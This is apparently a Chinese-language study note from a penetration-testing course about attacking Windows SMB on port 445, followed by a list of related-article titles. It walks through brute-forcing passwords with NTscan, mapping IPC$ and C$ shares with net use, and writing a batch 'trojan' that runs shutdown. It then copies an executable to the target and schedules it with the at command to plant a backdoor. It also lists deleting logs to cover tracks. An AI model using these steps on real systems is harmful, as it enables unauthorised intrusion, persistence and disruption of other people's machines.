渗透测试(445端口)
笔记
由于太困,文章涉及的软件想要私聊(其实网上都有,想找都能找到)
还有有的软件下载谷歌浏览器权限不足(这个问题我也不知道是不是叫这个)
解决:谷歌里面安装迅雷插件,或者换个浏览器下载或者复制下载连接在迅雷里面下载;
太困了,明天再写吧!1!!!
1.授权
2.信息收集(nslookup whois)
3.扫描漏洞
namp扫描IP 范围 端口 80 {IIS,apache,什么网站,软件 漏洞})scanpot软件扫描;
高级扫描:如IIS漏洞 2003-iis6.0 2008iis7.0
扫描网站漏洞(十大网站漏洞 )
4.漏洞利用
5.提权(shell环境命令控制权,桌面环境,最高权限)
=======删库跑路
6.毁尸灭迹(删除日志)
7.留后门
8.渗透测试报告(漏洞,端口)=》安全加固方案
手工测试端口号开放:
telnet IP地址 测试端口
映射共享文件夹,在本地电脑F盘
net use f: \10.1.1.2\share ROOT /user:administrator
net use f: \10.1.1.2\share /del
md 文件夹(创建文件夹)
w漏洞利用之IPC$:
net use f: \10.1.1.2\share 密码 /user:用户名
net use f: /del
net use * /del
net use f: \10.1.1.2\c$ 密码 /user:用户名
net use f: \10.1.1.2\ipc$ 密码 /user:用户名
暴力破解系统密码之445:
445漏洞利用之一IPC$:
1、scanport 扫描445端口
2、进行暴力破解:NTscan
net use f: \10.1.1.2\ipc$ 密码 /user:用户名
net use f: \10.1.1.2\share 密码 /user:用户
net use * /del
net use * /del
net use f: \10.1.1.2\c$ 密码 /user:用户名
4、制作木马
copy con haha.bat
shutdown -s -t 100
^z
拷贝在f:盘
copy haha.bat f:
5、植入木马(留后门)
copy d:\heihei.exe \10.1.1.2\c$
6、设计计划任务自动执行木马:
net time \10.1,1.2
at \10.1.1.2 11:11 “c:\heihei.exe”
7、等待肉鸡上线
参考文献:
千锋教育(https://www.bilibili.com/video/BV1i7411G7vm)
渗透测试(445端口)相关推荐
- 通过Metasploitable2了解渗透测试基本思路
0×00 前言/什么是Metasploitable2: Metasploitable是一个刻意制造的Linux靶机.此系统可应用于渗透测试,测试安全工具以及实践常见的渗透测试技术.Metasploit ...
- 3.100个渗透测试实战#3(Lampiao)
目录 一.实验环境 二.实验流程 三.实验步骤 (一)信息收集--主机发现 1.查看kali的网卡和IP信息:(网卡名:eht0:IP:192.168.97.129) 2.查看靶机页面: 3.探测特定 ...
- 渗透测试入门15之常见端口安全测试
在渗透测试中,端口扫描是一个非常重要的环节,端口扫描的目的是了解服务器上运行的服务信息,针对不同的端口进行不同的安全测试,本文的主要内容是关于常见端口安全隐患以及测试方法. DNS(53)UDP DN ...
- 渗透测试入门8之端口渗透
渗透测试入门8之端口渗透 端口扫描 1.端口的指纹信息(版本信息) 2.端口所对应运行的服务 3.常见的默认端口号 4.尝试弱口令 端口爆破 hydra 端口弱口令 NTScan Hscan 自写脚本 ...
- 《Nmap渗透测试指南》—第6章6.6节源端口欺骗
本节书摘来自异步社区<Nmap渗透测试指南>一书中的第6章6.6节源端口欺骗,作者 商广明,更多章节内容可以访问云栖社区"异步社区"公众号查看. 6.6 源端口欺骗 表 ...
- 渗透测试中常用端口及利用
渗透测试中常用端口及利用 端口 服务 入侵方式 21 ftp/tftp/vsftpd文件传输协议 爆破/嗅探/溢出/后门 22 ssh远程连接 爆破/openssh漏洞 23 Telnet远程连接 爆 ...
- 渗透测试常见的默认端口
** 在渗透中端口扫描的收集主机那些那些服务很重要,这里收集到一些常见的的服务端口,欢迎补充. ** ## 1.web常用端口 第三方通用组件漏洞: struts thinkphp jboss gan ...
- 渗透测试信息收集之域名信息、子域名信息、IP信息、端口信息
域名信息收集 什么是信息收集 信息收集是指通过各种方式获取所需要的信息,以便我们在后续的渗透过程更好的进行 比如目标站点IP.中间件.脚本语言.端口.邮箱等等.信息收集包含资产收集但不限于资产收集 信 ...
- nmap扫描ipv6端口_web渗透测试系列 之 扫描(3)
Nmap-扫描器之王 今天我们来聊聊被称之为扫描器之王的nmap,一般我们在渗透的时候都会这样说,第一步nmap开路.Nmap是一款网络扫描和主机检测的工具.开源免费的.可用于:主机发现.端口发现或枚 ...
- Kali渗透测试-远程控制:6200端口变成“后门”
Kali渗透测试-远程控制:6200端口变成"后门" 测试环境 攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248) 靶机:M ...
最新文章
- android theme material,Android Studio 换主题(Material Theme..)
- 打造一个宇宙 星系模拟产生对宇宙进化惊人见解
- 利用Glibc库-ORIGIN-提权
- 天天动听 半透明Menu效果
- 苹果笔记本能玩英雄联盟吗_《英雄联盟手游》日服安卓和ios数据互通说明 安卓和ios可以一起玩吗_英雄联盟手游...
- Nginx编译-安装-配置-优化实践总结
- 4006.Cacti集监控IBM刀片服务器温度和风扇运行状态
- 手写字体怎么转换?如何快速转换字体?
- 基于链表的学生信息管理系统和基于MySQL的学生信息管理系统 -C语言
- 姑娘,你需要台灯吗?
- 越喜欢村上春树,就越懂得生活
- Xutils上传图片(2)
- danlock锁_微信指纹密码锁下载最新版-微信指纹密码(Applock指纹)锁手机版app下载v2.51-单游网...
- Mac升级pip3 | pip install --upgrade pip
- 【Java基础】包、类、接口、常量、方法、变量的命名规则
- ,什么叫他妈的惊喜?
- 问卷调查工具专业排行榜
- 【抖音运营完整篇一】硬性条件过关,抖音视频播放量才会爆
- java angular2集成_Angular2整合其他插件的方法
- 深入浅出 Vue 中的 key 值